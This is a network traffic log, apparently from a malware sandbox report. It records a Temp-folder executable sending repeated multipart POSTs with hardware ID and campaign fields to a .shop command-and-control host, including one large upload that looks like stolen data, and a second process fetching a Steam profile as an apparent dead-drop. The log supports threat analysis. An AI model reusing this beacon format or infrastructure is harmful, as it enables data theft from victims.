                                                            2024-05-27 13:23:39 UTC12841OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 33 32 45 30 31 39 41 34 32 37 38 38 44 30 41 36 41 44 45 41 32 33 36 38 43 38 41 44 38 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"EF32E019A42788D0A6ADEA2368C8AD82--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                            2024-05-27 13:23:40 UTC810INHTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:23:40 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=ai1uvia382pr3hctb7g3t0ohun; expires=Fri, 20-Sep-2024 07:10:19 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1FP0sBH1WEl5RH1cCxbXUZF9Wm3borx2%2FP4AXdlGD89prz5UeauZZuz9BUUsoVgjgaTlP4VrmaTTIK3yVfMNBOETV5uS93x2ctTQ0TokSWp%2FvUyVTlvhk4%2F5rQkNfbsgtSzjnwaFxHCLLsQ%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 88a6521d8baf78df-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-27 13:23:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                            Data Ascii: fok 8.46.123.175
                                                            2024-05-27 13:23:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.853074188.114.96.34437992C:\Users\user\AppData\Local\Temp\5876.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:23:41 UTC290OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 15070
                                                            Host: whispedwoodmoodsksl.shop
                                                            2024-05-27 13:23:41 UTC15070OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 33 32 45 30 31 39 41 34 32 37 38 38 44 30 41 36 41 44 45 41 32 33 36 38 43 38 41 44 38 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"EF32E019A42788D0A6ADEA2368C8AD82--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                            2024-05-27 13:23:41 UTC810INHTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:23:41 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=ld83o519b0o1es6ge9ccskff5j; expires=Fri, 20-Sep-2024 07:10:20 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jHxW0YOZrbXWBbbyrhiLRCoAuQfXIUZ1nQ9E7BF5fME0dWeZzlq64N42uBllLJyAWxzyB7JYZZoez6M%2BqeurBmap0Gss0Vt%2BH4GMkGyqQTfBCeubB%2FWWqXM1P8uCYxe0mmxNRcRuk4ojd8Q%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 88a6522749f243d9-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-27 13:23:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                            Data Ascii: fok 8.46.123.175
                                                            2024-05-27 13:23:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.853076188.114.96.34437992C:\Users\user\AppData\Local\Temp\5876.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:23:42 UTC290OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 20237
                                                            Host: whispedwoodmoodsksl.shop
                                                            2024-05-27 13:23:42 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 33 32 45 30 31 39 41 34 32 37 38 38 44 30 41 36 41 44 45 41 32 33 36 38 43 38 41 44 38 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"EF32E019A42788D0A6ADEA2368C8AD82--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                            2024-05-27 13:23:42 UTC4906OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00
                                                            Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
                                                            2024-05-27 13:23:43 UTC814INHTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:23:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=9ohetou75lbi9bsf83e87aa9k6; expires=Fri, 20-Sep-2024 07:10:22 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tM3BVMBFiqRjkVpkPYmJEPUVLvFBPaXiaDJeZAhAB3v%2BiNkxevCrQNKNfWscfSGZdfcOAMVkRC%2BQkG0k2yC1cSwy6fqSP%2FKTA0YKkoX%2BeYflYX5TVpW%2F6PXjnrcMvGyqrDrPmCkmWPmiGw8%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 88a6522f2ae61a40-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-27 13:23:43 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                            Data Ascii: fok 8.46.123.175
                                                            2024-05-27 13:23:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.853077188.114.96.34437992C:\Users\user\AppData\Local\Temp\5876.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:23:44 UTC289OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 5435
                                                            Host: whispedwoodmoodsksl.shop
                                                            2024-05-27 13:23:44 UTC5435OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 33 32 45 30 31 39 41 34 32 37 38 38 44 30 41 36 41 44 45 41 32 33 36 38 43 38 41 44 38 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"EF32E019A42788D0A6ADEA2368C8AD82--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                            2024-05-27 13:23:44 UTC808INHTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:23:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=o09r657bmocsj3vndeopi83lsd; expires=Fri, 20-Sep-2024 07:10:23 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MUeHlBy7ggQh08NBYWC2rORhil6gnVwnhL46kcmhjuI5UF%2Bb%2B3bvJ9xAtzG9yVbsQjUEdSwaQSyDSNslMYT15q6p5wPqouW1CWTaihXbL9ySEicLZ0i3jkiuXihVG5JpO8DIR9XwovUgX0w%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 88a65238baed43cf-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-27 13:23:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                            Data Ascii: fok 8.46.123.175
                                                            2024-05-27 13:23:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.853082188.114.96.34437992C:\Users\user\AppData\Local\Temp\5876.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:06 UTC289OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1206
                                                            Host: whispedwoodmoodsksl.shop
                                                            2024-05-27 13:24:06 UTC1206OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 33 32 45 30 31 39 41 34 32 37 38 38 44 30 41 36 41 44 45 41 32 33 36 38 43 38 41 44 38 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"EF32E019A42788D0A6ADEA2368C8AD82--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                            2024-05-27 13:24:07 UTC820INHTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:24:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=7s8i79364obrkh949cfrkg1arq; expires=Fri, 20-Sep-2024 07:10:46 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KKy%2Fg5YVMIhaTp%2FVLUIcwcS6GQoSg9RqN0Kqfat%2FEw4nDpo%2FzozvabC5MQc8vWA%2FyKoZlzDjo%2FqJfbuu%2BeuUivfJsNW80SVy5K2rbkghxtEZiT9pS1%2BewpAiSfsaiU9CaibkK15QRWUoR6I%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 88a652c5980c7d05-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-27 13:24:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                            Data Ascii: fok 8.46.123.175
                                                            2024-05-27 13:24:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.853085104.102.42.294437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:10 UTC119OUTGET /profiles/76561199689717899 HTTP/1.1
                                                            Host: steamcommunity.com
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:11 UTC1882INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                            Cache-Control: no-cache
                                                            Date: Mon, 27 May 2024 13:24:11 GMT
                                                            Content-Length: 35672
                                                            Connection: close
                                                            Set-Cookie: sessionid=59cf56a4d66635d77522f3b7; Path=/; Secure; SameSite=None
                                                            Set-Cookie: steamCountry=US%7C493458b59285f9aa948bf050e0c9a39b; Path=/; Secure; HttpOnly; SameSite=None
                                                            2024-05-27 13:24:11 UTC14502INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                            2024-05-27 13:24:11 UTC16384INData Raw: 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74
                                                            Data Ascii: submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="submenuit
                                                            2024-05-27 13:24:11 UTC3768INData Raw: 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 5f 62 61 64 67 65 5f 61 72 65 61 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 70 72 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 36 38 39 37 31 37 38 39 39 2f 62 61 64 67 65 73 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c
                                                            Data Ascii: ss="profile_header_badgeinfo_badge_area"><a data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199689717899/badges"><
                                                            2024-05-27 13:24:11 UTC1018INData Raw: 69 74 65 20 69 73 20 70 72 6f 76 69 64 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0d 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 70 72 69 76 61 63 79 5f 61 67
                                                            Data Ascii: ite is provided by <a href="https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/privacy_ag


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.853086188.114.96.34437992C:\Users\user\AppData\Local\Temp\5876.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:10 UTC291OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 569527
                                                            Host: whispedwoodmoodsksl.shop
                                                            2024-05-27 13:24:10 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 33 32 45 30 31 39 41 34 32 37 38 38 44 30 41 36 41 44 45 41 32 33 36 38 43 38 41 44 38 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"EF32E019A42788D0A6ADEA2368C8AD82--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
